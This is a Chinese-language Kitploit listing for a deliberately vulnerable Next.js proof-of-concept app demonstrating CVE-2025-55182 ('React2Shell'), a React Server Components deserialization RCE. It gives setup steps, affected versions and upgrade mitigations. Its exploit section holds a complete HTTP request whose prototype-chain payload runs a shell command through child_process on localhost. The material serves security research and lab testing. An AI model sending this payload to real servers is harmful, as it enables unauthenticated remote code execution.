Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
NextJS-app-CVE-2025-55182 — 概念验证 Next.js 应用程序,演示 CVE-2025-55182(React2Shell),这是 React Server Components 中的一个严重 RCE,包含利用示例和安全研究缓解指南。 | Kitploit
工具/GitHubGitHub/s-mughal/nextjs-app-cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubs-mughal/nextjs-app-cve-2025-55182

NextJS-app-CVE-2025-55182

概念验证 Next.js 应用程序,演示 CVE-2025-55182(React2Shell),这是 React Server Components 中的一个严重 RCE,包含利用示例和安全研究缓解指南。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
18个月前尚未审核
分享

Next.js CVE-2025-55182 概念验证

这是 Next.js 应用程序的概念验证,受到 CVE-2025-55182(也称为 "React2Shell")的影响,这是一个 React 服务器组件中的严重远程代码执行(RCE)漏洞。

⚠️ 警告

此应用程序故意包含漏洞,仅应用于:

  • 安全研究
  • 教育目的
  • 在隔离环境中测试

不要:

  • 部署到生产环境
  • 暴露给不受信任的网络
  • 与敏感数据一起使用

漏洞详情

CVE-2025-55182 影响:

  • React 版本 19.0.0 到 19.2.0
  • Next.js 版本 15.x 和 16.x(使用 App Router)
  • 使用 React 服务器组件(RSC)的应用程序

该漏洞源于 React 服务器组件有效负载处理中的不安全反序列化,允许未经身份验证的攻击者通过特制的 HTTP 请求在服务器上执行任意代码。

设置说明

选项 1:本地开发

  1. 安装依赖项:

    root@kitploit:~
    npm install
    
  2. 运行开发服务器:

    root@kitploit:~
    npm run dev
    
  3. 访问应用程序: 在浏览器中打开 http://localhost:3000。

选项 2:Docker

  1. 构建 Docker 镜像:

    root@kitploit:~
    docker build -t nextjs-cve-2025-55182 .
    
  2. 运行容器:

    root@kitploit:~
    docker run --rm -p 3000:3000 nextjs-cve-2025-55182
    
  3. 访问应用程序: 在浏览器中打开 http://localhost:3000。

应用程序结构

  • 登录页面 (/):使用 React 服务器组件的简单登录表单
  • 仪表板 (/dashboard):登录后可访问的受保护页面

存在漏洞的组件

此应用程序使用:

  • Next.js 15.1.0(存在漏洞的版本)
  • React 19.0.0(存在漏洞的版本)
  • 使用 React 服务器组件(RSC)的 App Router
  • 基本的 create-next-app 结构

漏洞存在于 RSC 有效负载反序列化机制中,可以通过向页面路由(例如 http://localhost:3000 或 http://localhost:3000/dashboard)发送恶意 multipart HTTP 请求来利用。任何使用 React 服务器组件的页面都存在此漏洞。

利用

可以通过向页面路由(例如 http://localhost:3000 或 http://localhost:3000/dashboard)发送特制的 HTTP 请求来利用该漏洞。该利用适用于任何使用 React 服务器组件的页面。

快速利用示例

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

该利用直接针对页面路由——适用于 localhost:3000(主页)或 localhost:3000/dashboard(仪表板页面)。

缓解措施

要修复此漏洞:

  • 将 React 升级到 19.0.1、19.1.2 或 19.2.1+ 版本
  • 将 Next.js 升级到打过补丁的版本(15.0.5+ 或带有补丁的 16.x)

参考

  • CVE-2025-55182
  • React 安全公告
  • Next.js 安全公告

许可证

此概念证明仅用于教育和安全研究目的。

下载工具